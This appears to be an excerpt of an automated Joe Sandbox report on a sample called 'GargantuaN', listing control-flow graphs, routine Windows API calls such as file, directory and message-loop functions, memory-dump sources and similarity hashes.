                                                        control_flow_graph 1057 d6b568-d6b581 PeekMessageW 1058 d6b583-d6b597 GetMessageW 1057->1058 1059 d6b5bc-d6b5be 1057->1059 1060 d6b5a8-d6b5b6 TranslateMessage DispatchMessageW 1058->1060 1061 d6b599-d6b5a6 IsDialogMessageW 1058->1061 1060->1059 1061->1059 1061->1060
                                                        APIs
                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00D6B579
                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D6B58A
                                                        • IsDialogMessageW.USER32(0002047E,?), ref: 00D6B59E
                                                        • TranslateMessage.USER32(?), ref: 00D6B5AC
                                                        • DispatchMessageW.USER32(?), ref: 00D6B5B6
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                         • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: Message$DialogDispatchPeekTranslate
                                                        • String ID:
                                                        • API String ID: 1266772231-0
                                                        • Opcode ID: d29e05fa4c8a47d0b69509d59f744f7d19623f8cf74614a778a47aec95e45449
                                                        • Instruction ID: e59c481f7b8eeb148a8b7f6bfd032e845fde2aab2bc587ebf1935088d4e88876
                                                        • Opcode Fuzzy Hash: d29e05fa4c8a47d0b69509d59f744f7d19623f8cf74614a778a47aec95e45449
                                                        • Instruction Fuzzy Hash: A0F0DA71A0132AEB8B20AFE6EC4CDDB7FBCEE057A17044515B90AD2150EB34E645DBB0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        control_flow_graph 1062 d6abab-d6abca GetClassNameW 1063 d6abf2-d6abf4 1062->1063 1064 d6abcc-d6abe1 call d61fbb 1062->1064 1065 d6abf6-d6abf9 SHAutoComplete 1063->1065 1066 d6abff-d6ac01 1063->1066 1069 d6abe3-d6abef FindWindowExW 1064->1069 1070 d6abf1 1064->1070 1065->1066 1069->1070 1070->1063
                                                        APIs
                                                        • GetClassNameW.USER32(?,?,00000050), ref: 00D6ABC2
                                                        • SHAutoComplete.SHLWAPI(?,00000010), ref: 00D6ABF9
                                                          • Part of subcall function 00D61FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00D5C116,00000000,.exe,?,?,00000800,?,?,?,00D68E3C), ref: 00D61FD1
                                                        • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00D6ABE9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                         • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                        • String ID: EDIT
                                                        • API String ID: 4243998846-3080729518
                                                        • Opcode ID: eb6f63975acda11045da406a63aef47c68f830716ea80b805a66b950a3809816
                                                        • Instruction ID: ef1e5ff8fc137a5dee2cf82e0e2db7ed120457eb56155c70621bf94a21b19866
                                                        • Opcode Fuzzy Hash: eb6f63975acda11045da406a63aef47c68f830716ea80b805a66b950a3809816
                                                        • Instruction Fuzzy Hash: D9F08232A00329B7DB206A289C09F9B776C9F46B40F4C4151BA45F2280D760EA418AB6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        control_flow_graph 1071 d59785-d59791 1072 d59793-d5979b GetStdHandle 1071->1072 1073 d5979e-d597b5 ReadFile 1071->1073 1072->1073 1074 d597b7-d597c0 call d598bc 1073->1074 1075 d59811 1073->1075 1079 d597c2-d597ca 1074->1079 1080 d597d9-d597dd 1074->1080 1077 d59814-d59817 1075->1077 1079->1080 1081 d597cc 1079->1081 1082 d597df-d597e8 GetLastError 1080->1082 1083 d597ee-d597f2 1080->1083 1084 d597cd-d597d7 call d59785 1081->1084 1082->1083 1085 d597ea-d597ec 1082->1085 1086 d597f4-d597fc 1083->1086 1087 d5980c-d5980f 1083->1087 1084->1077 1085->1077 1086->1087 1089 d597fe-d59807 GetLastError 1086->1089 1087->1077 1089->1087 1090 d59809-d5980a 1089->1090 1090->1084
                                                        APIs
                                                        • GetStdHandle.KERNEL32(000000F6), ref: 00D59795
                                                        • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00D597AD
                                                        • GetLastError.KERNEL32 ref: 00D597DF
                                                        • GetLastError.KERNEL32 ref: 00D597FE
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                         • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$FileHandleRead
                                                        • String ID:
                                                        • API String ID: 2244327787-0
                                                        • Opcode ID: 3040a77f915ce72bb23223ef5658c88ac571143a574bcb30eec1e35ff90fb312
                                                        • Instruction ID: 9ef5f70a2644fa4d91201c0c630d596814c613feb7f21d9c1d1e30714ca08051
                                                        • Opcode Fuzzy Hash: 3040a77f915ce72bb23223ef5658c88ac571143a574bcb30eec1e35ff90fb312
                                                        • Instruction Fuzzy Hash: EA117C30910204EBDF205F64C824A69BBA9FB46723F24892AEC5AC5290D774DE4CAB71
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        control_flow_graph 1092 d7ad34-d7ad48 1093 d7ad55-d7ad70 LoadLibraryExW 1092->1093 1094 d7ad4a-d7ad53 1092->1094 1096 d7ad72-d7ad7b GetLastError 1093->1096 1097 d7ad99-d7ad9f 1093->1097 1095 d7adac-d7adae 1094->1095 1100 d7ad7d-d7ad88 LoadLibraryExW 1096->1100 1101 d7ad8a 1096->1101 1098 d7ada1-d7ada2 FreeLibrary 1097->1098 1099 d7ada8 1097->1099 1098->1099 1103 d7adaa-d7adab 1099->1103 1102 d7ad8c-d7ad8e 1100->1102 1101->1102 1102->1097 1104 d7ad90-d7ad97 1102->1104 1103->1095 1104->1103
                                                        APIs
                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,00D73F73,00000000,00000000,?,00D7ACDB,00D73F73,00000000,00000000,00000000,?,00D7AED8,00000006,FlsSetValue), ref: 00D7AD66
                                                        • GetLastError.KERNEL32(?,00D7ACDB,00D73F73,00000000,00000000,00000000,?,00D7AED8,00000006,FlsSetValue,00D87970,FlsSetValue,00000000,00000364,?,00D798B7), ref: 00D7AD72
                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00D7ACDB,00D73F73,00000000,00000000,00000000,?,00D7AED8,00000006,FlsSetValue,00D87970,FlsSetValue,00000000), ref: 00D7AD80
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                         • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad$ErrorLast
                                                        • String ID:
                                                        • API String ID: 3177248105-0
                                                        • Opcode ID: f920f423418920d77ecd36dc094df981309620afb469119cab7cd0c2a3629d10
                                                        • Instruction ID: 8ed5ec113998e8658e37c8924d8b2492e8913c70deb165b748761cc0be596a4f
                                                        • Opcode Fuzzy Hash: f920f423418920d77ecd36dc094df981309620afb469119cab7cd0c2a3629d10
                                                        • Instruction Fuzzy Hash: 8E01D436211332ABC7314A6DDC44A5A7B98EF85BA27294620F91ED7650F720DC0187F1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetStdHandle.KERNEL32(000000F5,?,?,?,?,00D5D343,00000001,?,?,?,00000000,00D6551D,?,?,?), ref: 00D59F9E
                                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,00D6551D,?,?,?,?,?,00D64FC7,?), ref: 00D59FE5
                                                        • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,00D5D343,00000001,?,?), ref: 00D5A011
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                         • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: FileWrite$Handle
                                                        • String ID:
                                                        • API String ID: 4209713984-0
                                                        • Opcode ID: 8b84f34be80108529c334573d4fc540de34dc0e953bf518f3bf3941e85340968
                                                        • Instruction ID: 7cd173067a5c836f4b52a6d9c8416c7e0ebebc88a1b881c9d1322d43e4ef0fa8
                                                        • Opcode Fuzzy Hash: 8b84f34be80108529c334573d4fc540de34dc0e953bf518f3bf3941e85340968
                                                        • Instruction Fuzzy Hash: B931CD71208315AFDF148F28D818B6AB7A5EF80B16F040618FD859B2D0C775A94CCBB2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 00D5C27E: _wcslen.LIBCMT ref: 00D5C284
                                                        • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00D5A175,?,00000001,00000000,?,?), ref: 00D5A2D9
                                                        • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00D5A175,?,00000001,00000000,?,?), ref: 00D5A30C
                                                        • GetLastError.KERNEL32(?,?,?,?,00D5A175,?,00000001,00000000,?,?), ref: 00D5A329
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                         • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: CreateDirectory$ErrorLast_wcslen
                                                        • String ID:
                                                        • API String ID: 2260680371-0
                                                        • Opcode ID: 3b86aa22dd1fb5ac4819378e147b131ab64d0d2ec60d70905113c514ffd83a29
                                                        • Instruction ID: ee94762111c68768a4fbcd21b397c3a4899d084be9408694353eb5cd0c15e848
                                                        • Opcode Fuzzy Hash: 3b86aa22dd1fb5ac4819378e147b131ab64d0d2ec60d70905113c514ffd83a29
                                                        • Instruction Fuzzy Hash: 5E01D8312102346AFF21ABB98C0ABFD3388DF0A787F484515FD41D6181E764CA89C6B7
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00D7B8B8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                         • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: Info
                                                        • String ID:
                                                        • API String ID: 1807457897-3916222277
                                                        Uniqueness
                                                        Uniqueness Score: -1.00%
                                                        APIs
                                                        • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 00D7AFDD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: String
                                                        • String ID: LCMapStringEx
                                                        • API String ID: 2568140703-3893581201
                                                        Uniqueness
                                                        Uniqueness Score: -1.00%
                                                        APIs
                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00D7A56F), ref: 00D7AF55
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: CountCriticalInitializeSectionSpin
                                                        • String ID: InitializeCriticalSectionEx
                                                        • API String ID: 2593887523-3084827643
                                                        Uniqueness
                                                        Uniqueness Score: -1.00%
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: Alloc
                                                        • String ID: FlsAlloc
                                                        • API String ID: 2773662609-671089009
                                                        Uniqueness
                                                        Uniqueness Score: -1.00%
                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6EAF9
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID: 3To
                                                        • API String ID: 1269201914-245939750
                                                        Uniqueness
                                                        Uniqueness Score: -1.00%
                                                        APIs
                                                          • Part of subcall function 00D7B7BB: GetOEMCP.KERNEL32(00000000,?,?,00D7BA44,?), ref: 00D7B7E6
                                                        • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00D7BA89,?,00000000), ref: 00D7BC64
                                                        • GetCPInfo.KERNEL32(00000000,00D7BA89,?,?,?,00D7BA89,?,00000000), ref: 00D7BC77
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: CodeInfoPageValid
                                                        • String ID:
                                                        • API String ID: 546120528-0
                                                        Uniqueness
                                                        Uniqueness Score: -1.00%
                                                        APIs
                                                        • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00D59A50,?,?,00000000,?,?,00D58CBC,?), ref: 00D59BAB
                                                        • GetLastError.KERNEL32(?,00000000,00D58411,-00009570,00000000,000007F3), ref: 00D59BB6
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: ErrorFileLastPointer
                                                        • String ID:
                                                        • API String ID: 2976181284-0
                                                        Uniqueness
                                                        Uniqueness Score: -1.00%
                                                        APIs
                                                          • Part of subcall function 00D797E5: GetLastError.KERNEL32(?,00D91030,00D74674,00D91030,?,?,00D73F73,00000050,?,00D91030,00000200), ref: 00D797E9
                                                          • Part of subcall function 00D797E5: _free.LIBCMT ref: 00D7981C
                                                          • Part of subcall function 00D797E5: SetLastError.KERNEL32(00000000,?,00D91030,00000200), ref: 00D7985D
                                                          • Part of subcall function 00D797E5: _abort.LIBCMT ref: 00D79863
                                                          • Part of subcall function 00D7BB4E: _abort.LIBCMT ref: 00D7BB80
                                                          • Part of subcall function 00D7BB4E: _free.LIBCMT ref: 00D7BBB4
                                                          • Part of subcall function 00D7B7BB: GetOEMCP.KERNEL32(00000000,?,?,00D7BA44,?), ref: 00D7B7E6
                                                        • _free.LIBCMT ref: 00D7BA9F
                                                        • _free.LIBCMT ref: 00D7BAD5
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: _free$ErrorLast_abort
                                                        • String ID:
                                                        • API String ID: 2991157371-0
                                                        Uniqueness
                                                        Uniqueness Score: -1.00%
                                                        APIs
                                                        • __EH_prolog.LIBCMT ref: 00D51E55
                                                          • Part of subcall function 00D53BBA: __EH_prolog.LIBCMT ref: 00D53BBF
                                                        • _wcslen.LIBCMT ref: 00D51EFD
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: H_prolog$_wcslen
                                                        • String ID:
                                                        • API String ID: 2838827086-0
                                                        Uniqueness
                                                        Uniqueness Score: -1.00%
                                                        APIs
                                                        • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00D573BC,?,?,?,00000000), ref: 00D59DBC
                                                        • SetFileTime.KERNELBASE(?,?,?,?), ref: 00D59E70
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: File$BuffersFlushTime
                                                        • String ID:
                                                        • API String ID: 1392018926-0
                                                        Uniqueness
                                                        Uniqueness Score: -1.00%
                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00D59F27,?,?,00D5771A), ref: 00D596E6
                                                        • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00D59F27,?,?,00D5771A), ref: 00D59716
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        Uniqueness
                                                        Uniqueness Score: -1.00%
                                                        APIs
                                                        • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00D59EC7
                                                        • GetLastError.KERNEL32 ref: 00D59ED4
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
